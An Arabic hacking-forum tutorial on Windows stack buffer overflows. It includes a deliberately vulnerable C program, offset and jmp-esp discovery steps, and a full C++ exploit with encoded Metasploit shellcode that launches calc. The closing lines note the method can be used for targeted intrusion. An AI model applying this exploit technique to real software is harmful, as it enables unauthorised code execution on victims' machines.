:: vBspiders Professional Network :: - شرح ثغرات فيض المكدس - Stack OverFlow Exploitation درس بالعربي + فيديو تطبيقي

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اللهم صلِّ على محمد وآل محمد

ذا اول درس اكتبه عن ثغرات الفيض stack buffer overflow http://saudihack.com/vb/images/smilies/biggrin.gif
وساشرح فيه ان شاء الله كيفية اكتشافها واستغلالها بنوع من التفصيل ان شاء الله
يلا بدون التكثير في الكلام نبدا ببسم الله
اولا نبدا بالاكتشاف

اكتشافها اسهل بكثير من استغلالها بحيث نقوم بارسال كمية كبيرة من البيانات عبر احد المداخل "inputs" اي كل ما يسمح لنا بادخال بيانات الى البرنامج فاذا ضهر لنا خطا فان البرنامج مصاب بثغرت فيض واذا لم يضهر فانه غير مصاب

ملاحضة : في بعض الاحيان يكون البرنامج مصاب ولكن يكون فيه كود للحماية ككود نقل التنفيذ الى كود اخر يضهر رسالة خطا دون التسبب في اغلاق البرنامج
وهذا سيجعل البعض يضن ان البرنامج غير مصاب وهذا غير صحيح
وفي هذه الحالة يمكننا اكتشاف الثغرة فقط بتتبع البرنامج باحد برامج التنقيح
تانيا الاستغلال

ربما سيكون هذا الجزء هو الاصعب ولكن ليس بعد ان تعرف اساسيات حدوث الفيض، لذا لاسهل علي الشرح واسهل عليك الفهم سابدا اولا بتعريف وتوضيح كل ما هو اساسي لاستغلال ثغرات الفيض :

1 المسجلات "Registers"

المسجلات هي مكان في بروسيسر الجهاز الذي يقوم بعمليات الحاسب الالي

2 مسجل الستاك "stack register"

هو مسجل يستعمل ليسهل على وحدة المعالجة المركزية التعامل مع داكرة النضام التي يكون البرنامج محملا عليها

3 المسجلات EIP - ESP

ESP
يشير دائما الى التعليمة التي تاتي بعد الكود المنفذ في الstack

لهذا يكتب الشل كود بعد عنوان العودة لتسهيل معرفة مكانه في الذاكرة

EIP
هو مسجل يخزن فيه عنوان التعليمة التي تاتي مبشرة بعد اي تعليمة تدهب بالتنفيد الى كود داخل الكود الرئيسي

ولفهم هذا الامر فلنرجع الى تعريف برنامج

البرنامج "Logiciel" هو مجموعة من البرانم "Programmes" كل برنام له عمل خاص

وهذه صورة موضحه

http://www10.0zz0.com/2008/12/27/22/946212154.jpg

كما ترون في الحقيقة البرنامج هو الجزء الرئيسي زائد الاجزاء الفرعية التي تسمى بالبرانم وهي تقوم بعمل وحيد فقط مثلا كود اغلاق الجهاز هو برنام واذا اردنا اطفاء الجهاز عن طريق زر في برنامج نضع في كود دلك الزر امر لاستدعاء هذا البرنام ليقوم بدوره باطفاء الجهاز

مثال اخر :
في الصورة اعلاه وبالضبط الزر "اضهار رسالة",,عندما نضغط عليه فان البرنامج يقوم باستدعاء البرنام المسؤول عن اضهار رسالة ويمرر التنفيذ اليه فنصبح الان خارج البرنامج الرئيسي وذاخل برنامج فرعي يقوم باضهار الرسالة

وعند ضهور الرسالة تكون مهمة البرنامج الفرعي قد انتهت وبذلك يمرر التنفيذ للبرنامج الرئيسي مرة اخرى

لنوضح اكثر بهذه الصورة

http://www10.0zz0.com/2008/12/27/22/595571536.jpg

لا شك ان صورة كيفية وقوع الفيض بدات تتضح لديك

ان استطعنا ان نغير عنوان العودة فاننا قد ندهب بالتنفيذ الى اي مكان نريده

مثلا ان ندهب بالتنفيذ الى عنوان الشل كود

دعني اوضح لك اكثر
عندما يحجز المبرمج متغير ما فان حالة الstack تكون كالتالي

كود:



buffer | 41414141

| 41414141

return addr | 004012A1

يعني اذا لم يقم المبرمج بالتاكد من طول البيانات المدخلة و طول المتغير

فان ادخال بيانات طويلة سيمكننا من الكتابة فوق عنوان العودة ليصبح الستاك كالتالي

كود:


 

buffer | 41414141

| 41414141

return addr | 41414141

A = 41 اذا حولناه الى قيم الهكس

فكل ما ندخله الى البرنامج

يحول الى قيم هيكس يعني لا يحفض كما هو فلو اذخلنا الى برنامج ABCD

41 42 43 44

بحيث

A = 41
B = 42
C = 43
D = 44

ويكتبها بالمقلوب

DCBA
قد تلاحظ اننا دخلنا مباشرة في الاستغلال ولكن لا تقلق سنبصط اكثر واكثر حتى يصبح الدرس اسهل وفي متناول الجميع
لنستمر في شرح الاساسيات
4 الشل كود "shellcode"
الشل كود عبارة عن برنامج/برنام مكتوب بطريقة احترافية تخوله للعمل في اي نضام دون الحاجة الى اي برنامج اخر (مترجم) وهذه الخاصية هي الاهم وهي التي تجعلنا نضع الشل كود في الثغرات لانه كما تعلم عندما تخترق عن بعد لا يمكنك ارفاق مترجم مع البرنامج بل تحتاج برنامج جاهز ما ان يصل الى الذاكرة يصبح قابل للتنفيذ .
الان وبعد ان فهمنا الاساسيات دعونا نقوم بخطوة لنتقدم بالموضوع الى الامام
وهي تلخيص فكرة كتابة استغلال ثغرة فيض المكدس :
ليحدث فيض يجب ان يكون لدينا متغير ذو حجم معين مثلا 260 بايت يجب علينا ادخال كمية كبيرة من المعلومات اي مثلا لو ادخلنا 270 فالبرنامج قادر فقط على تخزين 260 حرف و 10 احرف المتبقية فلا مكان لها بل سيكتبها فوق كل ما هو موجود بعد المساحة المحددة من طرف البرنامج وكما تعلمون عنوان العودة يكون ايضا بعد هذه المساحة اذن هكذا سيتم الكتابة فوقه وهكذا سنتحكم في البرنامج وذلك بتغيير عنوان العودة الى اي عنوان نريده
الان عرفنا كيف نتحكم في سير البرنامج اي فهمنا كيف نغير عنوان العودة
ماذا بعد ؟

تحدثت لنا على الشلكود وقلت انه يكتب ايضا في الذاكرة وللوصول الى هدفنا (وهو تنفيد الشلكود في جهاز الضحية) كيف سنعرف مكان هذا الشل كود ؟ او كيف نعرف عنوانه لكي نقوم بكتابته فوق عنوان العودة ؟

الجواب هو :

عند ادخال الشل كود الى البرنامج يكون على الشكل التالي

AAAAAAAA+عنوان العودة+shellcode

ويصبح بعد كتابته في الذاكرة

buffer (A's) | 41414141
41414141 |
عنوان العودة| عنوان العودة الجديد
الشل كود | الشل كود يوجد مباشرة بعد عنوان العودة

وهنا ياتي دور المسجل ESP راجع تعريفه "ضروري"

اكيد عرفتها قلنا انه هذا المسجل يسجل عنوان التعليمة التي بعد التعليمة المنفذة

وفي حالتنا هذه التعليمة المنفذة هي retn

اي العودة الى عنوان العودة وبما ان الشل كود موجود مباشرة بعدها هذا يعني ان العنوان المخزن بالمسجل ESP هو عنوان الشل كود

لذا لكي ننفذ الشل كود او لننقل التنفيذ اليه يجب علينا البحث عن قفزة للمسجل ESP

صورة تبسيطية :

http://www10.0zz0.com/2008/12/27/22/813045092.jpg

ضنك الان فهمت كيف ينفذ الشل كود (ان لم تفهم اعد القراءة "تساعد على الفهم اكثر") .

قذ تلاحظ ان هذا الجزء كله نضري ولن ادعك تقول هذا في رد بل سننتقل الان الى الجزء التطبيقي من الدرس

سنقوم بكتابة استغلال لبرنامج مصاب بثغرة فيض طبعا نحن من سيقوم بكتابته وبلغة سي ثم نقوم بعمل اكسبلويت له ان شاء الله

يلا نبدا ببسم الله

هذا هو سورس كود برنامجنا التطبيقي

كود PHP:

        #include <stdio.h>
#include <string.h>
void overflow_function (char *str)
{
char buffer[256];
strcpy(buffer, str); 
}
int main(int argc, char **argv)
{
overflow_function(argv[1]);
return 0;
}

يجب عليك ترجمته بمترجم مايكروسوفت لضمان ان تكون النتائج مطابقة بين الشرح وتطبيقك

"Visual C++ 6.0"

كما ترى اكواد بسيطة جدا ولكن لاباس بشرحها

http://www10.0zz0.com/2008/12/27/22/124333884.jpg

كما ترى الدالة التي يحدث فيها الخطا هي دالة strcpy

حيث يتم نقل محتوى المتغير str الى المتغير buffer

وعليه اذا كان حجم المتغير str اكبر من 256 فانه سيتم الكتابة فوق عنوان العودة

هيا بنا فلنبدا بمعرفة هل البرنامج مصاب ام لا

بعد ترجمته شغله انطلاقا من الدوس ومرر اليه سلسلة من الحروف كبيرة

ولتكن 300A

اي الحرف A 300 مرة

http://www10.0zz0.com/2008/12/27/22/602133712.jpg

كما تلاحظ ضهو الخطا معناه ان البرنامج مصاب

الان انتهت مرحلة الكشف عن الخطا وجاء دور كتابة الاستغلال ( هو سهل فقط شوية تركيز

اول خطوة يجب القيام بها هو تحديد كم عدد من البيتات تلزمنا قبل ان نصل الى عنوان العودة يعني من بداية البفر الى اخر بايت قبل عنوان العودة

ولعمل هذا نقوم بادخال سلسلة من الاحرف مختلفة الى البرنامج ويفضل ان تكون هاش

استعن بهذا الموقع وشفر مجموعة كلمات مختلفة ثم اجمع الهاشات فما بينها حتى تحصل على 300 بايت

كود:



     

                            http://www.spijoprod.net/outils/md5.php

كود PHP:

        3691308f2a4c2f6983f2880d32e29c8403c7c0ace395d80182db07ae2c30f0345d41402abc4b2a76b9719d911017c592ce57579e09df9aa67e82a9552789b1f14d4098d64e163d2726959455d046fd7cded9fd7fac6bfe771195dc39cd7644c72035a61774315c394238af637e64a30e2035a61774315c394238af637e64a30e6ba667f2e5fb6e2e9a9edd14f49a3d5312e24270d85b

تح البرنامج المصاب بالمنقح اولي ollydbg ومرر اليه سلسلة الاحرف وذلك باختيار argument من قائمة debug

ثم انتر ثم اضغط على ctrl+f2 ثم اختر يس ليعاد تحميل البرنامج

بعد دلك اضغط على F9 ليتم تشغيل البرنامج

والنتيجة رسالة خطا

http://www10.0zz0.com/2008/12/27/22/361709770.jpg

اضغط انتر
ثم قم بعمل كما في الصورة التالية

http://www10.0zz0.com/2008/12/27/22/730395448.jpg

http://www10.0zz0.com/2008/12/27/22/287209904.jpg

عد دلك عد الى السلسلة التي ادخلناها وقم بالبحث عن تلك الحروف والارقام التي قلت لك احفضها في الصورة اعلاه وستكون النتيجة كالتالي

http://www10.0zz0.com/2008/12/27/22/661576917.jpg

قم بمسح 67f2 وكل ماياتي بعدها ليكون عدد البيتات الباقي هو 260

وهكذا نكون قد حددنا حجم البفر
الخطوة التانية هي البحث عن عنوان العودة المناسب وللقيام بهذا العمل يلزمنا برنامج اسمه findjmp
ووضيفته هي اجاد اي قفزة للمسجل esp وبالتالي يتم تنفيذ الشل كود

حمل من هنـا

فك الضغط عنه وضعه في القرص c: ثم شغله من الدوس وافعل كما في الصورة

http://www10.0zz0.com/2008/12/27/22/277285648.jpg

بعد ان احصلنا على عنوان القفزة فلنعدل عليه كما يلي
0x7C86379E
اقلب ترتيب كل عددين ليصبح
9E 37 86 7C
الان اضف اليه x\ ليصبح
\x9E\x37\x86\x7C
الان انتهينا من اعداد عنوان العودة الجديد
والخطوة التالية هي اعداد الشل كود الذي نريده
فكما تعلمون هناك شل كودات كثيرة حسب عملها فهناك منها من يقوم بتشغيل الحاسبه وهذا هو الذي يستعمل عند مكتشفي الثغرات لكي يجربو نجاح الثغرة
وهناك شل كود لفتح منفذ او تحميل باتش وتشغيله في جهاز الضحية
هيا بنا اذن فلنقم بانشاء شل كود للتجربة فقط وهو شل كود بعد تنفيذ الثغرة يشغل لنا الالة الحاسبة المرفقة مع الوندوز
ولهذا الغرض نستعين بالله و بموقع ميتاسبلويت
وهو

كود PHP:

http://www.m e t asploit.com:55555/PAYLOADS?FILTER=win32

(الفراغات بسبب التشفير)

ازل الفواصل بين كلمة ميتا
ثم اختر تنفيد الاوامر
windows excute command
ثم
http://www10.0zz0.com/2008/12/27/22/823414474.jpg

سينتج لنا شل كودين
اختر الاول كما في الصورة ( لا تنسى اي شيء والا لن يعمل الاكسبلويت )
http://www10.0zz0.com/2008/12/27/22/166958294.jpg

لان اصبح كل شيء جاهزا وبقي فقط كتابة الاكسبلويت
ويمكننا فعل ذلك باية لغة برمجة مثلا c++ او c او بيرل او بيتون ...الخ
انا ساستخدم لغة c++
المهم قبل فعل هذا دعني اوضح لك فكرة عمل الاستغلال فمن فهم الفكرة سيستطيع كتابة استغلاله باي لغة اراد
اولا لكي تنفذ الثغرة ويتم تشغيل الحاسبة يجب علينا تمرير سلسلة حروف لملء البفر + عنوان القفزة + الشلكود
junkdata+return address+shellcode
اذن الاكسبلويت سيقوم بجمع كل هذه الاشياء ثم يشغل البرنامج المصاب ويمرر اليه هده السلسلة
(اي كود الاستغلال junkdata+return address+shellcode )

هذا هو كود الاستغلال

كود:

كود PHP:

        #include <windows.h>
#include <string.h>
#include <stdio.h>
int main()
{
//file name
char exploit[700]="vuln.exe "; 
//ret addr
char ret[] = "\xC0\x68\x83\x7C";
//junk data
char overflow[260];
for(int i=0;i<260;i++){
overflow[i]=0x41;
}
/*
* windows/exec - 144 bytes
* http://www.****sploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
char shellcode[] =
"\xbf\xdb\xf9\x8c\x6d\x31\xc9\xb1\x1e\xda\xcd\xd9\x74\x24\xf4"
"\x58\x31\x78\x0f\x03\x78\x0f\x83\xe8\x27\x1b\x79\x91\x3f\x98"
"\x82\x6a\xbf\xaa\xc6\x56\x34\xd0\xcd\xde\x4b\xc6\x45\x51\x53"
"\x93\x05\x4e\x62\x48\xf0\x05\x50\x05\x02\xf4\xa9\xd9\x9c\xa4"
"\x4d\x19\xea\xb3\x8c\x50\x1e\xbd\xcc\x8e\xd5\x86\x84\x74\x12"
"\x8c\xc1\xfe\x45\x4a\x08\xea\x1c\x19\x06\xa7\x6b\x42\x0a\x36"
"\x87\xf6\x2e\xb3\x56\xe2\xc7\x9f\x7c\xf0\x14\x40\x4c\x0e\xfa"
"\x29\xca\x65\xbc\xe5\x99\x3a\x4c\x8d\xee\xa6\xe1\x1a\x66\xdf"
"\x70\xe4\xf4\x1f\xe8\x45\x93\x6f\x66\x61\x3c\xf8\xee\x94\x48"
"\xf6\x59\x96\xaa\x64\x04\x04\x56\x6b";
printf("Exploiting ......\n");
strcat(exploit, overflow);
strcat(exploit, ret);
strcat(exploit, shellcode);
WinExec(exploit,0);
printf("Exploitation Finished\n");
return 0;
}

ترجمه وضعه في نفس المجلد الذي وضعت فيه البرنامج المصاب ثم شغله والنتيجة هي اشتغال الالة الحاسبة

وهذا فيديو تطبيقي من صاحب الموضوع الأصلي : http://saudihack.com/vb/images/smilies/smile.gif

كود PHP:

   http://www.ouatmane.org/mr-cracker.rar

وياليت اننا نتعمق شوي في الميتاسبلويت والشل كود
وطبعا البفر فلو هي من اساسيات الثغرات المستخدمه فيها

ولا ننسى طبعا بأمكان الشخص تحويل كل ذلك في الاختراق المستهدف http://saudihack.com/vb/images/smilies/smile.gif

والصلات والسلام على سيدنا محمد صلى الله عليه وسلم

للامانه الموضوع منقول